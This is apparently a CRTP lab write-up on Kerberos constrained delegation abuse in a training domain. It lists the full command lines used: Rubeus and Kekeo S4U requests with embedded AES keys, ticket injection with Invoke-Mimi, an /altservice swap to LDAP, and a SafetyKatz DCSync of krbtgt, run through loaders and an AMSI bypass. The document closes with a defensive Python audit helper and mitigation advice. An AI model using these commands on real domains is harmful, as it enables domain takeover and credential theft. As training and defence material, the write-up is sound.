# CRTP Lab 16

## Task 1

Enumerate **users** in the domain for whom Constrained Delegation is enabled.

* For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
* Pass the ticket and access the service

Use InviShell and PowerView to enumerate users with constrained delegation enabled.

```
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

PS C:\Users\student372> . C:\AD\Tools\PowerView.ps1


PS C:\Users\student372> Get-DomainUser -TrustedToAuth
```

websvc has constrained delegation enabled to CIFS/dcorp-mssql. Since we already have websvc's credentials (its AES key), we can use them to access CIFS on dcorp-mssql as Domain Administrator.

First we request a TGS for websvc itself on behalf of the Domain Administrator (first hop, S4U2Self). That TGS is then exchanged for a TGS to the CIFS service on dcorp-mssql (second hop, S4U2Proxy), which is the ticket we use to access the share.

### Abuse with Rubeus

We use the websvc AES key to request a TGS as Domain Administrator from the KDC and inject it into the current session (`/ptt`).

{% code overflow="wrap" %}

```
# ArgSplit for "s4u"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

klist
```

{% endcode %}

Now we can access the CIFS service.

```
C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
```

### Abuse with Kekeo

Request a TGT for websvc using its AES key.

{% code overflow="wrap" %}

```
C:\Windows\system32>cd C:\AD\Tools\kekeo\x64

C:\AD\Tools\kekeo\x64>.\kekeo.exe

kekeo # tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
```

{% endcode %}

We use this TGT to request a TGS for CIFS/dcorp-mssql on behalf of the Domain Administrator.

{% code overflow="wrap" %}

```
kekeo # tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
```

{% endcode %}

Since the ticket is saved to a `.kirbi` file, we inject it into the current session to use it: open InviShell, import Invoke-Mimi, and pass the ticket.

{% code overflow="wrap" %}

```
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
```

{% endcode %}

We can now access the CIFS service.

```
C:\AD\Tools\kekeo\x64>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
```

## Task 2

Enumerate **computer** accounts in the domain for which Constrained Delegation is enabled.

* For such a user, request a TGT from the DC.
* Obtain an alternate TGS for LDAP service on the target machine.
* Use the TGS for executing DCSync attack.

We use InviShell and import PowerView to find computer accounts with constrained delegation enabled.

```
# InviShell and AMSI bypass, then PowerView:
PS C:\AD\Tools\kekeo\x64> . C:\AD\Tools\PowerView.ps1

# Enumerate Computers with Constrained Delegation enabled
PS C:\AD\Tools\kekeo\x64> Get-DomainComputer -TrustedToAuth
```

dcorp-adminsrv$ has constrained delegation enabled to time/dcorp-dc. Since we have the AES key of dcorp-adminsrv$, we use Rubeus to impersonate the Domain Administrator and request an alternate service ticket for LDAP on the DC (`/altservice:ldap`).

{% code overflow="wrap" %}

```
# ArgSplit for s4u
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
```

{% endcode %}

With the LDAP ticket for dcorp-dc injected, we run DCSync to dump the krbtgt secrets.

{% code overflow="wrap" %}

```
# The service name in the TGS is not in the encrypted part of the ticket, so it can be swapped:
# instead of TIME we requested the ticket for LDAP (/altservice). HTTP etc. works the same way.
# ArgSplit lsadump::dcsync

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"
```

{% endcode %}
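As an added example (not from the lab or the course tooling), here is a Python audit helper a defender can run over the same attributes PowerView enumerates with `-TrustedToAuth`, rating exposure the way the two tasks above exploit it. The sample records are constructed; the `userAccountControl` bit values are the standard AD ones.

```python
# Added audit helper, not part of the CRTP lab or its tools. Given directory
# attributes of accounts, it reports constrained-delegation exposure the way a
# defender would review Get-DomainUser / Get-DomainComputer -TrustedToAuth output.

# userAccountControl bits (well-known AD values)
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition: S4U2Self works for any user

# Constructed sample records shaped like the attributes PowerView returns
SAMPLE_ACCOUNTS = [
    {"sam": "websvc", "userAccountControl": 0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL", "CIFS/dcorp-mssql"]},
    {"sam": "dcorp-adminsrv$", "userAccountControl": 0x1000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["time/dcorp-dc.dollarcorp.moneycorp.LOCAL", "time/dcorp-dc"]},
    {"sam": "appsvc", "userAccountControl": 0x200,   # Kerberos-only constrained delegation
     "msDS-AllowedToDelegateTo": ["HTTP/dcorp-web.dollarcorp.moneycorp.LOCAL:8080"]},
]

def delegation_hosts(spns):
    """Short hostnames reachable through delegation. The service class (CIFS, time, ...)
    is dropped on purpose: it sits in the unencrypted part of the ticket, so any
    service on the host is effectively allowed (the /altservice swap in the lab)."""
    hosts = set()
    for spn in spns:
        _cls, _, rest = spn.partition("/")          # SPN is class/host[:port][/name]
        hosts.add(rest.split("/")[0].split(":")[0].split(".")[0].lower())
    return hosts

def audit(accounts, domain_controllers):
    """Findings for accounts with msDS-AllowedToDelegateTo, most severe first."""
    dcs = {d.split(".")[0].lower() for d in domain_controllers}
    findings = []
    for acct in accounts:
        hosts = delegation_hosts(acct.get("msDS-AllowedToDelegateTo", []))
        if not hosts:
            continue
        transition = bool(acct["userAccountControl"] & TRUSTED_TO_AUTH_FOR_DELEGATION)
        if transition and hosts & dcs:
            sev = "critical"   # any user, any service on a DC: LDAP means DCSync
        elif transition:
            sev = "high"       # any user not marked NOT_DELEGATED, any service on these hosts
        else:
            sev = "medium"     # the victim must first authenticate to the service itself
        findings.append({"account": acct["sam"], "hosts": sorted(hosts),
                         "protocol_transition": transition, "severity": sev})
    order = {"critical": 0, "high": 1, "medium": 2}
    return sorted(findings, key=lambda f: order[f["severity"]])

def can_be_impersonated(user_uac):
    """False when NOT_DELEGATED is set: the KDC then refuses to issue delegated tickets
    for that user (Protected Users membership has the same effect but is not a UAC bit)."""
    return not (user_uac & NOT_DELEGATED)

if __name__ == "__main__":
    for finding in audit(SAMPLE_ACCOUNTS, ["dcorp-dc.dollarcorp.moneycorp.local"]):
        print(finding)
```

Setting `NOT_DELEGATED` (or Protected Users membership) on privileged accounts such as Administrator is the mitigation that breaks both tasks even where the delegation configuration stays as it is.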

